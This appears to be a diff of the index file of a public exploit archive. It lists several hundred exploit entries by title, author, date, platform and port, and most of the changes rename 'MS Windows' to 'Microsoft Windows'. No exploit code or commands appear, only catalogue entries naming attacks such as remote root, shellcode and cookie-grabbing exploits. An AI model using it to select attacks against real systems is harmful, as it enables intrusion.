347,platforms/linux/remote/347.c,"Squid 2.4.1 - Remote Buffer Overflow Exploit",2002-05-14,Teso,linux,remote,0 348,platforms/linux/remote/348.c,"wu-ftpd <= 2.6.1 - Remote Root Exploit",2002-05-14,Teso,linux,remote,21 349,platforms/multiple/remote/349.txt,"SSH (x2) Remote Root Exploit",2002-05-01,Teso,multiple,remote,22 -350,platforms/windows/local/350.c,"MS Windows 2000 Utility Manager Privilege Elevation Exploit (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0 -351,platforms/windows/local/351.c,"MS Windows 2K POSIX Subsystem Privilege Escalation Exploit (MS04-020)",2004-07-17,bkbll,windows,local,0 -352,platforms/windows/local/352.c,"MS Windows 2000 Universal Language Utility Manager Exploit (MS04-019)",2004-07-17,kralor,windows,local,0 -353,platforms/windows/local/353.c,"MS Windows 2K/XP Task Scheduler .job Exploit (MS04-022)",2004-07-18,N/A,windows,local,0 +350,platforms/windows/local/350.c,"Microsoft Windows 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0 +351,platforms/windows/local/351.c,"Microsoft Windows 2000 - POSIX Subsystem Privilege Escalation Exploit (MS04-020)",2004-07-17,bkbll,windows,local,0 +352,platforms/windows/local/352.c,"Microsoft Windows 2000 - Universal Language Utility Manager Exploit (MS04-019)",2004-07-17,kralor,windows,local,0 +353,platforms/windows/local/353.c,"Microsoft Windows 2000/XP - Task Scheduler .job Exploit (MS04-022)",2004-07-18,N/A,windows,local,0 354,platforms/windows/dos/354.html,"MS Internet Explorer Overly Trusted Location Cache Exploit",2004-07-18,N/A,windows,dos,0 -355,platforms/windows/local/355.c,"MS Windows 2k Utility Manager (All-In-One) Exploit (MS04-019)",2004-07-20,kralor,windows,local,0 +355,platforms/windows/local/355.c,"Microsoft Windows 2000 - Utility Manager (All-In-One) Exploit (MS04-019)",2004-07-20,kralor,windows,local,0 356,platforms/windows/dos/356.c,"OverByte ICS FTP Server Remote Denial of Service Exploit",2004-07-20,ATmaCA,windows,dos,0 357,platforms/windows/dos/357.c,"Medal of Honor Remote Buffer Overflow Vulnerability",2004-07-20,"Luigi Auriemma",windows,dos,0 358,platforms/hardware/dos/358.txt,"Lexmark Multiple HTTP Servers Denial of Service Vulnerability",2004-07-22,"Peter Kruse",hardware,dos,0 @@ -338,9 +338,9 @@ id,file,description,date,author,platform,type,port 363,platforms/hardware/dos/363.txt,"Conceptronic CADSLR1 Router Denial of Service Vulnerability",2004-07-22,"Seth Alan Woolley",hardware,dos,0 364,platforms/linux/remote/364.pl,"Samba <= 3.0.4 SWAT Authorization Buffer Overflow Exploit",2004-07-22,"Noam Rathaus",linux,remote,901 365,platforms/windows/dos/365.html,"MS Internet Explorer (11 bytes) Denial of Service Exploit",2004-07-23,Phuong,windows,dos,0 -366,platforms/windows/dos/366.pl,"MS Windows SMS 2.0 - Denial of Service Exploit",2004-07-24,MacDefender,windows,dos,0 +366,platforms/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service Exploit",2004-07-24,MacDefender,windows,dos,0 367,platforms/osx/local/367.txt,"Mac OS X Panther Internet Connect Local Root Exploit",2004-07-28,B-r00t,osx,local,0 -368,platforms/windows/local/368.c,"MS Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0 +368,platforms/windows/local/368.c,"Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0 369,platforms/linux/local/369.pl,"SoX Local Buffer Overflow Exploit",2004-08-01,"Serkan Akpolat",linux,local,0 370,platforms/linux/dos/370.c,"Citadel/UX Remote Denial of Service Exploit (PoC)",2004-08-02,CoKi,linux,dos,0 371,platforms/linux/dos/371.c,"Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)",2004-08-02,N/A,linux,dos,0 @@ -414,18 +414,18 @@ id,file,description,date,author,platform,type,port 469,platforms/linux/local/469.c,"CDRecord's ReadCD Local Root Privileges",2004-09-19,"Max Vozeler",linux,local,0 470,platforms/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission Exploit",2004-09-21,"Angelo Rosiello",linux,local,0 471,platforms/windows/dos/471.pl,"Emulive Server4 7560 Remote Denial of Service Exploit",2004-09-21,"GulfTech Security",windows,dos,66 -472,platforms/windows/remote/472.c,"MS Windows JPEG GDI+ Overflow Shellcoded Exploit",2004-09-22,FoToZ,windows,remote,0 +472,platforms/windows/remote/472.c,"Microsoft Windows - JPEG GDI+ Overflow Shellcoded Exploit",2004-09-22,FoToZ,windows,remote,0 473,platforms/windows/remote/473.c,"MDaemon 6.5.1 IMAP/SMTP Remote Buffer Overflow Exploit",2004-09-22,D_BuG,windows,remote,143 -474,platforms/windows/dos/474.sh,"MS Windows JPEG Processing Buffer Overrun Exploit (MS04-028)",2004-09-22,perplexy,windows,dos,0 -475,platforms/windows/remote/475.sh,"MS Windows JPEG GDI+ Overflow Administrator Exploit (MS04-028)",2004-09-23,"Elia Florio",windows,remote,0 +474,platforms/windows/dos/474.sh,"Microsoft Windows - JPEG Processing Buffer Overrun Exploit (MS04-028)",2004-09-22,perplexy,windows,dos,0 +475,platforms/windows/remote/475.sh,"Microsoft Windows - JPEG GDI+ Overflow Administrator Exploit (MS04-028)",2004-09-23,"Elia Florio",windows,remote,0 476,platforms/linux/local/476.c,"glFTPd Local Stack Overflow Exploit (PoC) (Slackware 9.0/9.1/10.0)",2004-09-23,CoKi,linux,local,0 477,platforms/windows/dos/477.c,"PopMessenger <= 1.60 Remote Denial of Service Exploit",2004-09-23,"Luigi Auriemma",windows,dos,8473 -478,platforms/windows/remote/478.c,"MS Windows JPEG GDI+ Overflow Download Shellcode Exploit (MS04-028)",2004-09-25,ATmaCA,windows,remote,0 +478,platforms/windows/remote/478.c,"Microsoft Windows - JPEG GDI+ Overflow Download Shellcode Exploit (MS04-028)",2004-09-25,ATmaCA,windows,remote,0 479,platforms/linux/local/479.c,"GNU Sharutils <= 4.2.1 - Local Format String PoC Exploit",2004-09-25,n4rk0tix,linux,local,0 -480,platforms/windows/remote/480.c,"MS Windows JPEG GDI+ Remote Heap Overflow Exploit (MS04-028)",2004-09-25,"John Bissell",windows,remote,0 +480,platforms/windows/remote/480.c,"Microsoft Windows - JPEG GDI+ Remote Heap Overflow Exploit (MS04-028)",2004-09-25,"John Bissell",windows,remote,0 482,platforms/hp-ux/local/482.c,"HP-UX 11.0/11.11 swxxx Local Root Shell Exploit",2002-12-11,watercloud,hp-ux,local,0 551,platforms/linux/dos/551.c,"MyServer 0.7.1 (POST) Denial of Service Exploit",2004-09-27,"Tom Ferris",linux,dos,0 -556,platforms/windows/remote/556.c,"MS Windows JPEG GDI+ All-In-One Bind/Reverse/Admin/FileDownload",2004-09-27,M4Z3R,windows,remote,0 +556,platforms/windows/remote/556.c,"Microsoft Windows - JPEG GDI+ All-In-One Bind/Reverse/Admin/FileDownload",2004-09-27,M4Z3R,windows,remote,0 558,platforms/windows/local/558.c,"WinRAR 1.0 - Local Buffer Overflow Exploit",2004-09-28,ATmaCA,windows,local,0 559,platforms/windows/local/559.c,"Zinf 2.2.1 - Local Buffer Overflow Exploit",2004-09-28,Delikon,windows,local,0 560,platforms/windows/local/560.txt,"GlobalSCAPE - CuteFTP macros (.mcr) - Local Vulnerability",2004-09-28,ATmaCA,windows,local,0 @@ -440,14 +440,14 @@ id,file,description,date,author,platform,type,port 573,platforms/windows/remote/573.c,"Icecast <= 2.0.1 Win32 Remote Code Execution Exploit (modded)",2004-10-12,K-C0d3r,windows,remote,8000 574,platforms/php/webapps/574.txt,"ocPortal 1.0.3 - Remote File Inclusion",2004-10-13,Exoduks,php,webapps,0 577,platforms/windows/remote/577.c,"YahooPOPs <= 1.6 SMTP Port Buffer Overflow Exploit",2004-10-15,class101,windows,remote,25 -578,platforms/windows/dos/578.pl,"MS Windows NNTP Service (XPAT) Denial of Service Exploit (MS04-036)",2004-10-16,"Lucas Lavarello",windows,dos,0 +578,platforms/windows/dos/578.pl,"Microsoft Windows NNTP Service (XPAT) Denial of Service Exploit (MS04-036)",2004-10-16,"Lucas Lavarello",windows,dos,0 579,platforms/bsd/local/579.sh,"BSD bmon <= 1.2.1_2 - Local Exploit",2004-10-16,"Idan Nahoum",bsd,local,0 580,platforms/linux/remote/580.c,"Monit <= 4.2 Basic Authentication Remote Root Exploit",2004-10-17,rtk,linux,remote,2812 581,platforms/linux/remote/581.c,"ProFTPD <= 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0 582,platforms/windows/remote/582.c,"YahooPOPs <= 1.6 SMTP Remote Buffer Overflow Exploit",2004-10-18,"Diabolic Crab",windows,remote,25 583,platforms/windows/remote/583.pl,"SLX Server 6.1 Arbitrary File Creation Exploit (PoC)",2004-10-18,"Carl Livitt",windows,remote,0 -584,platforms/windows/remote/584.c,"MS Windows Metafile (.emf) Heap Overflow Exploit (MS04-032)",2004-10-20,houseofdabus,windows,remote,0 -585,platforms/windows/dos/585.pl,"MS Windows IIS WebDAV XML Denial of Service Exploit (MS04-030)",2004-10-20,"Amit Klein",windows,dos,0 +584,platforms/windows/remote/584.c,"Microsoft Windows Metafile (.emf) Heap Overflow Exploit (MS04-032)",2004-10-20,houseofdabus,windows,remote,0 +585,platforms/windows/dos/585.pl,"Microsoft Windows IIS - WebDAV XML Denial of Service Exploit (MS04-030)",2004-10-20,"Amit Klein",windows,dos,0 586,platforms/linux/local/586.c,"BitchX 1.0c19 Local Root Exploit (suid?)",2004-10-20,Sha0,linux,local,0 587,platforms/linux/local/587.c,"Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit",2004-10-21,xCrZx,linux,local,0 588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21 @@ -490,7 +490,7 @@ id,file,description,date,author,platform,type,port 636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit (c source)",2004-11-16,NoPh0BiA,windows,remote,80 637,platforms/windows/remote/637.c,"MailCarrier 2.51 Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,25 638,platforms/windows/remote/638.py,"SLMail 5.5 - POP3 PASS Buffer Overflow Exploit",2004-11-18,muts,windows,remote,110 -640,platforms/windows/remote/640.c,"MS Windows Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0 +640,platforms/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0 641,platforms/windows/remote/641.txt,"MS Internet Explorer 6.0 SP2 File Download Security Warning Bypass",2004-11-19,cyber_flash,windows,remote,0 642,platforms/cgi/webapps/642.pl,"TWiki 20030201 search.pm Remote Command Execution Exploit",2004-11-20,RoMaNSoFt,cgi,webapps,0 643,platforms/windows/remote/643.c,"SLMail 5.5 - POP3 PASS Remote Buffer Overflow Exploit",2004-12-21,"Haroon Rashid Astwat",windows,remote,0 @@ -559,13 +559,13 @@ id,file,description,date,author,platform,type,port 718,platforms/linux/local/718.c,"Linux Kernel 2.6.x chown() Group Ownership Alteration Exploit",2004-12-24,"Marco Ivaldi",linux,local,0 719,platforms/windows/remote/719.txt,"MS Internet Explorer <= XP SP2 - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0 720,platforms/php/webapps/720.pl,"Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,N/A,php,webapps,0 -721,platforms/windows/dos/721.html,"MS Windows Kernel ANI File Parsing Crash Vulnerability",2004-12-25,Flashsky,windows,dos,0 +721,platforms/windows/dos/721.html,"Microsoft Windows Kernel - ANI File Parsing Crash Vulnerability",2004-12-25,Flashsky,windows,dos,0 725,platforms/php/webapps/725.pl,"PhpInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion",2004-12-25,N/A,php,webapps,0 726,platforms/windows/remote/726.c,"Netcat v1.1 - ""-e"" Switch Remote Buffer Overflow Exploit",2004-12-26,class101,windows,remote,0 729,platforms/windows/remote/729.txt,"PHP <= 4.3.7 openlog() Buffer Overflow Exploit",2004-12-28,"The Warlock [BhQ]",windows,remote,80 730,platforms/windows/remote/730.html,"MS Internet Explorer Remote Code Execution with Parameters - PoC",2004-12-28,ShredderSub7,windows,remote,0 -733,platforms/windows/remote/733.c,"MS Windows 2000 WINS Remote Code Execution Exploit",2004-12-31,zuc,windows,remote,42 -734,platforms/windows/remote/734.c,"MS Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)",2004-12-31,houseofdabus,windows,remote,139 +733,platforms/windows/remote/733.c,"Microsoft Windows 2000 - WINS Remote Code Execution Exploit",2004-12-31,zuc,windows,remote,42 +734,platforms/windows/remote/734.c,"Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)",2004-12-31,houseofdabus,windows,remote,139 736,platforms/windows/dos/736.c,"SOLDNER Secret Wars <= 30830 Denial of Service Exploit",2005-01-04,"Luigi Auriemma",windows,dos,20000 737,platforms/php/webapps/737.txt,"QWikiwiki Directory Traversal Vulnerability",2005-01-04,Madelman,php,webapps,0 738,platforms/php/webapps/738.c,"iWebNegar Configuration Nullification Denial of Service Exploit",2005-01-04,c0d3r,php,webapps,0 @@ -577,7 +577,7 @@ id,file,description,date,author,platform,type,port 744,platforms/linux/local/744.c,"Linux Kernel <= 2.4.29-rc2 uselib() Privilege Elevation",2005-01-07,"Paul Starzetz",linux,local,0 745,platforms/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (cgi-version)",2005-01-08,ZzagorR,multiple,remote,10000 746,platforms/multiple/remote/746.pl,"Webmin 1.5 - BruteForce + Command Execution",2005-01-08,ZzagorR,multiple,remote,10000 -749,platforms/windows/local/749.cpp,"MS Windows Improper Token Validation Local Exploit (working)",2005-01-11,"Cesar Cerrudo",windows,local,0 +749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local Exploit",2005-01-11,"Cesar Cerrudo",windows,local,0 750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x Browser Overflow (c version)",2005-01-11,class101,windows,remote,6101 753,platforms/windows/remote/753.html,"MS Internet Explorer .ANI Remote Stack Overflow (0.2)",2005-01-12,Skylined,windows,remote,0 754,platforms/php/webapps/754.pl,"ITA Forum <= 1.49 SQL Injection Exploit",2005-01-13,RusH,php,webapps,0 @@ -681,7 +681,7 @@ id,file,description,date,author,platform,type,port 858,platforms/php/webapps/858.txt,"phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial)",2005-03-05,PPC,php,webapps,0 859,platforms/windows/remote/859.c,"CA License Server (GETCONFIG) Remote Buffer Overflow Exploit (c)",2005-03-06,class101,windows,remote,10203 860,platforms/php/webapps/860.c,"Aztek Forum <= 4.0 [myadmin.php] Database Dumper Exploit",2005-03-07,sirius_black,php,webapps,0 -861,platforms/windows/dos/861.c,"MS Windows XP/2003 Remote Denial of Service Exploit",2005-03-07,RusH,windows,dos,0 +861,platforms/windows/dos/861.c,"Microsoft Windows 2003/XP - Remote Denial of Service Exploit",2005-03-07,RusH,windows,dos,0 862,platforms/cgi/webapps/862.txt,"The Includer CGI <= 1.0 - Remote Command Execution",2005-03-07,"Francisco Alisson",cgi,webapps,0 863,platforms/windows/local/863.cpp,"RealPlayer 10 "".smil"" File Local Buffer Overflow Exploit",2005-03-07,nolimit,windows,local,0 864,platforms/php/webapps/864.txt,"phpWebLog <= 0.5.3 Arbitrary File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 @@ -728,7 +728,7 @@ id,file,description,date,author,platform,type,port 906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x- Remote Heap Buffer Overflow Exploit (2)",2005-04-01,class101,windows,remote,20031 907,platforms/php/webapps/907.pl,"phpBB <= 2.0.13 'downloads.php' mod Remote Exploit",2005-04-02,CereBrums,php,webapps,0 908,platforms/windows/dos/908.c,"ArGoSoft FTP Server <= 1.4.2.8 - Denial of Service Exploit",2005-04-03,c0d3r,windows,dos,0 -909,platforms/windows/remote/909.cpp,"MS Windows (WINS) Remote Buffer Overflow Exploit (v.3)",2005-04-12,class101,windows,remote,42 +909,platforms/windows/remote/909.cpp,"Microsoft Windows - (WINS) Remote Buffer Overflow Exploit (3)",2005-04-12,class101,windows,remote,42 910,platforms/php/webapps/910.pl,"phpBB <= 2.0.13 'Calendar Pro' mod Remote Exploit",2005-04-04,CereBrums,php,webapps,0 911,platforms/linux/dos/911.c,"Linux Kernel PPC64/IA64 (AIO) - Local Denial of Service Exploit",2005-04-04,"Daniel McNeil",linux,dos,0 912,platforms/windows/local/912.c,"GetDataBack Data Recovery 2.31 - Local Exploit",2005-04-04,Kozan,windows,local,0 @@ -756,11 +756,11 @@ id,file,description,date,author,platform,type,port 935,platforms/windows/local/935.c,"Morpheus <= 4.8 - Local Chat Passwords Disclosure Exploit",2005-04-13,Kozan,windows,local,0 936,platforms/windows/local/936.c,"DeluxeFtp 6.x Local Password Disclosure Exploit",2005-04-13,Kozan,windows,local,0 937,platforms/windows/local/937.c,"BitComet 0.57 Local Proxy Password Disclosure Exploit",2005-04-13,Kozan,windows,local,0 -938,platforms/windows/local/938.cpp,"MS Windows (HTA) Script Execution Exploit (MS05-016)",2005-04-14,ZwelL,windows,local,0 +938,platforms/windows/local/938.cpp,"Microsoft Windows - (HTA) Script Execution Exploit (MS05-016)",2005-04-14,ZwelL,windows,local,0 939,platforms/php/webapps/939.pl,"Serendipity 0.8beta4 exit.php SQL Injection Exploit",2005-04-13,kre0n,php,webapps,0 940,platforms/linux/remote/940.c,"Sumus 0.2.2 httpd Remote Buffer Overflow Exploit",2005-04-14,vade79,linux,remote,81 941,platforms/windows/dos/941.c,"Yager <= 5.24 Multiple Denial of Service Exploit",2005-04-14,"Luigi Auriemma",windows,dos,0 -942,platforms/windows/dos/942.c,"MS Windows Malformed IP Options DoS Exploit (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0 +942,platforms/windows/dos/942.c,"Microsoft Windows - Malformed IP Options DoS Exploit (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0 943,platforms/windows/remote/943.html,"Mozilla Browsers - x (Link) Code Execution Exploit",2005-04-18,"Michael Krax",windows,remote,0 944,platforms/windows/remote/944.c,"WheresJames Webcam Publisher Beta 2.0.0014 Remote Buffer Overflow",2005-04-18,tarako,windows,remote,0 945,platforms/windows/remote/945.c,"PMSoftware Simple Web Server (GET Request) Remote BoF Exploit",2005-04-24,cybertronic,windows,remote,80 @@ -792,7 +792,7 @@ id,file,description,date,author,platform,type,port 973,platforms/linux/local/973.c,"ARPUS/Ce Local File Overwrite Exploit (setuid)",2005-05-01,"Kevin Finisterre",linux,local,0 974,platforms/linux/local/974.pl,"ARPUS/Ce Local Overflow Exploit (setuid) (perl)",2005-05-01,"Kevin Finisterre",linux,local,0 975,platforms/windows/remote/975.py,"GlobalScape Secure FTP Server 3.0 - Buffer Overflow Exploit",2005-05-01,muts,windows,remote,21 -976,platforms/windows/remote/976.cpp,"MS Windows WINS Vulnerability and OS/SP Scanner",2005-05-02,class101,windows,remote,0 +976,platforms/windows/remote/976.cpp,"Microsoft Windows WINS Vulnerability and OS/SP Scanner",2005-05-02,class101,windows,remote,0 977,platforms/hp-ux/remote/977.c,"HP-UX FTPD <= 1.1.214.4 ""REST"" Remote Brute Force Exploit",2005-05-03,phased,hp-ux,remote,0 978,platforms/windows/dos/978.cpp,"Ashley's Web Server Denial of Service Exploit",2005-05-04,basher13,windows,dos,0 979,platforms/windows/remote/979.txt,"Hosting Controller <= 0.6.1 Unauthenticated User Registration Exploit",2005-05-04,Mouse,windows,remote,0 @@ -810,7 +810,7 @@ id,file,description,date,author,platform,type,port 997,platforms/linux/local/997.sh,"Linux Mandrake <= 10.2 - cdrdao Local Root Exploit (unfixed)",2005-05-17,newbug,linux,local,0 998,platforms/linux/dos/998.c,"Linux Kernel <= 2.6.12-rc4 - (ioctl_by_bdev) Local Denial of Service Exploit",2005-05-17,alert7,linux,dos,0 999,platforms/linux/dos/999.c,"Gaim <= 1.2.1 URL Handling Remote Stack Overflow Exploit",2005-05-17,Ron,linux,dos,0 -1000,platforms/windows/dos/1000.cpp,"MS Windows XP/2003 - IPv6 Remote Denial of Service Exploit",2005-05-17,"Konrad Malewski",windows,dos,0 +1000,platforms/windows/dos/1000.cpp,"Microsoft Windows 2003/XP - IPv6 Remote Denial of Service Exploit",2005-05-17,"Konrad Malewski",windows,dos,0 1001,platforms/aix/local/1001.txt,"AIX 5.1 Bellmail Local Race Condition Exploit Exploit",2005-05-19,watercloud,aix,local,0 1003,platforms/php/webapps/1003.c,"Fusion SBX <= 1.2 - Remote Command Execution Exploit",2005-05-20,Silentium,php,webapps,0 1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2nd updated)",2005-05-20,Nikyt0x,cgi,webapps,0 @@ -828,7 +828,7 @@ id,file,description,date,author,platform,type,port 1016,platforms/php/webapps/1016.pl,"phpStat <= 1.5 (setup.php) Authentication Bypass Exploit (perl)",2005-05-30,Alpha_Programmer,php,webapps,0 1017,platforms/php/webapps/1017.php,"phpStat <= 1.5 (setup.php) Authentication Bypass Exploit (php)",2005-05-30,mh_p0rtal,php,webapps,0 1018,platforms/php/webapps/1018.php,"phpStat <= 1.5 (setup.php) Authentication Bypass Exploit (php 2)",2005-05-30,Nikyt0x,php,webapps,0 -1019,platforms/windows/local/1019.c,"MS Windows COM Structured Storage Local Exploit (MS05-012)",2005-05-31,"Cesar Cerrudo",windows,local,0 +1019,platforms/windows/local/1019.c,"Microsoft Windows - COM Structured Storage Local Exploit (MS05-012)",2005-05-31,"Cesar Cerrudo",windows,local,0 1020,platforms/php/webapps/1020.c,"Zeroboard 4.1 preg_replace Remote nobody Shell Exploit",2005-05-31,n0gada,php,webapps,0 1021,platforms/linux/remote/1021.c,"Ethereal <= 0.10.10 (SIP) Protocol Dissector Remote BoF Exploit",2005-05-31,"Team W00dp3ck3r",linux,remote,0 1022,platforms/php/webapps/1022.pl,"MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit",2005-05-31,"Alberto Trivero",php,webapps,0 @@ -872,7 +872,7 @@ id,file,description,date,author,platform,type,port 1062,platforms/php/webapps/1062.pl,"Cacti <= 0.8.6d Remote Command Execution Exploit",2005-06-22,"Alberto Trivero",php,webapps,0 1063,platforms/php/webapps/1063.pl,"phpBB <= 2.0.15 Register Multiple Users Denial of Service (perl code)",2005-06-22,g30rg3_x,php,webapps,0 1064,platforms/php/webapps/1064.c,"phpBB <= 2.0.15 Register Multiple Users Denial of Service (c code)",2005-06-22,HaCkZaTaN,php,webapps,0 -1065,platforms/windows/dos/1065.c,"MS Windows (SMB) Transaction Response Handling Exploit (MS05-011)",2005-06-23,cybertronic,windows,dos,0 +1065,platforms/windows/dos/1065.c,"Microsoft Windows - (SMB) Transaction Response Handling Exploit (MS05-011)",2005-06-23,cybertronic,windows,dos,0 1066,platforms/windows/remote/1066.cpp,"MS Outlook Express NNTP Buffer Overflow Exploit (MS05-030)",2005-06-24,eyas,windows,remote,0 1067,platforms/windows/dos/1067.cpp,"TCP-IP Datalook <= 1.3 - Local Denial of Service Exploit",2005-06-25,basher13,windows,dos,0 1068,platforms/php/webapps/1068.pl,"PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit",2005-06-25,Easyex,php,webapps,0 @@ -882,7 +882,7 @@ id,file,description,date,author,platform,type,port 1072,platforms/multiple/dos/1072.cpp,"Stream / Raped Denial of Service Attack (win version)",2005-06-27,"Marco Del Percio",multiple,dos,0 1073,platforms/solaris/local/1073.c,"Solaris 9 / 10 ld.so Local Root Exploit (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1074,platforms/solaris/local/1074.c,"Solaris 9 / 10 - ld.so Local Root Exploit (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 -1075,platforms/windows/remote/1075.c,"MS Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 +1075,platforms/windows/remote/1075.c,"Microsoft Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103 1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 (highlight) Remote PHP Code Execution",2005-06-29,rattle,php,webapps,0 1077,platforms/php/webapps/1077.pl,"Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit",2005-06-30,"James Bercegay",php,webapps,0 1078,platforms/php/webapps/1078.pl,"XML-RPC Library <= 1.3.0 (xmlrpc.php) Remote Code Injection Exploit",2005-07-01,ilo--,php,webapps,0 @@ -910,7 +910,7 @@ id,file,description,date,author,platform,type,port 1101,platforms/windows/dos/1101.c,"wMailServer 1.0 - Remote Denial of Service Exploit",2005-07-12,Kozan,windows,dos,0 1102,platforms/windows/remote/1102.html,"Mozilla Firefox <= 1.0.4 ""Set As Wallpaper"" Code Execution Exploit",2005-07-13,"Michael Krax",windows,remote,0 1103,platforms/php/webapps/1103.txt,"phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)",2005-07-13,"Sjaak Rake",php,webapps,0 -1104,platforms/windows/dos/1104.cpp,"MS Windows Netman Service Local Denial of Service Exploit",2005-07-14,bkbll,windows,dos,0 +1104,platforms/windows/dos/1104.cpp,"Microsoft Windows Netman Service Local Denial of Service Exploit",2005-07-14,bkbll,windows,dos,0 1105,platforms/windows/dos/1105.c,"NetPanzer <= 0.8 - Remote Denial of Service Exploit",2005-07-14,"Luigi Auriemma",windows,dos,0 1106,platforms/php/webapps/1106.txt,"e107 <= 0.617 - XSS Remote Cookie Disclosure Exploit",2005-07-14,warlord,php,webapps,0 1107,platforms/windows/dos/1107.pl,"Remote Control Server 1.6.2 - Denial of Service Exploit",2005-07-15,basher13,windows,dos,0 @@ -922,7 +922,7 @@ id,file,description,date,author,platform,type,port 1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 Remote PHP Code Execution Exploit (metasploit)",2005-07-19,str0ke,php,webapps,0 1114,platforms/multiple/remote/1114.c,"HP OpenView OmniBack II Generic Remote Exploit",2000-12-21,DiGiT,multiple,remote,5555 1115,platforms/windows/remote/1115.pl,"Intruder Client 1.00 Remote Command Execution & DoS Exploit",2005-07-21,basher13,windows,remote,0 -1116,platforms/windows/dos/1116.c,"MS Windows Color Management Module Overflow Exploit (MS05-036)",2005-07-21,snooq,windows,dos,0 +1116,platforms/windows/dos/1116.c,"Microsoft Windows - Color Management Module Overflow Exploit (MS05-036)",2005-07-21,snooq,windows,dos,0 1118,platforms/windows/remote/1118.c,"SlimFTPd <= 3.16 Remote Buffer Overflow Exploit",2005-07-25,redsand,windows,remote,21 1119,platforms/multiple/local/1119.txt,"vim 6.3 < 6.3.082 (modlines) Local Command Execution Exploit",2005-07-25,"Georgi Guninski",multiple,local,0 1120,platforms/cgi/webapps/1120.pl,"FtpLocate <= 2.02 (current) Remote Command Execution Exploit",2005-07-25,newbug,cgi,webapps,0 @@ -931,7 +931,7 @@ id,file,description,date,author,platform,type,port 1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server <= 8.15 IMAPD Remote Root Exploit",2005-08-01,kingcope,linux,remote,143 1126,platforms/windows/dos/1126.c,"BusinessMail Server <= 4.60.00 Remote Denial of Service Exploit",2005-08-01,Kozan,windows,dos,0 1127,platforms/windows/dos/1127.cpp,"ProRat Server <= 1.9 (Fix-2) Buffer Overflow Crash Exploit",2005-08-01,"evil dabus",windows,dos,0 -1128,platforms/windows/local/1128.c,"MS Windows (LegitCheckControl.dll) Genuine Advantage Validation Patch",2005-08-01,HaCkZaTaN,windows,local,0 +1128,platforms/windows/local/1128.c,"Microsoft Windows - (LegitCheckControl.dll) Genuine Advantage Validation Patch",2005-08-01,HaCkZaTaN,windows,local,0 1129,platforms/windows/dos/1129.c,"Quick 'n EasY <= 3.0 FTP Server Remote Denial of Service Exploit",2005-08-02,Kozan,windows,dos,0 1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent (dbasqlr.exe) Remote Exploit",2005-08-03,cybertronic,windows,remote,6070 1131,platforms/windows/remote/1131.c,"CA BrightStor ARCserve Backup (dsconfig.exe) Buffer Overflow",2005-08-03,cybertronic,windows,remote,41523 @@ -944,12 +944,12 @@ id,file,description,date,author,platform,type,port 1139,platforms/linux/remote/1139.c,"Ethereal 10.x AFP Protocol Dissector Remote Format String Exploit",2005-08-06,vade79,linux,remote,0 1140,platforms/php/webapps/1140.php,"Flatnuke <= 2.5.5 - Remote Code Execution",2005-08-08,rgod,php,webapps,0 1142,platforms/php/webapps/1142.php,"Wordpress <= 1.5.1.3 - Remote Code Execution 0Day",2005-08-09,Kartoffelguru,php,webapps,0 -1143,platforms/windows/dos/1143.sys,"MS Windows XP SP2 (rdpwd.sys) Remote Kernel DoS Exploit",2005-08-09,"Tom Ferris",windows,dos,0 +1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 (rdpwd.sys) Remote Kernel DoS Exploit",2005-08-09,"Tom Ferris",windows,dos,0 1144,platforms/windows/remote/1144.html,"MS Internet Explorer (blnmgr.dll) COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0 1145,platforms/php/webapps/1145.pm,"Wordpress <= 1.5.1.3 - Remote Code Execution eXploit (metasploit)",2005-08-10,str0ke,php,webapps,0 -1146,platforms/windows/remote/1146.c,"MS Windows Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139 +1146,platforms/windows/remote/1146.c,"Microsoft Windows Plug-and-Play Service Remote Overflow 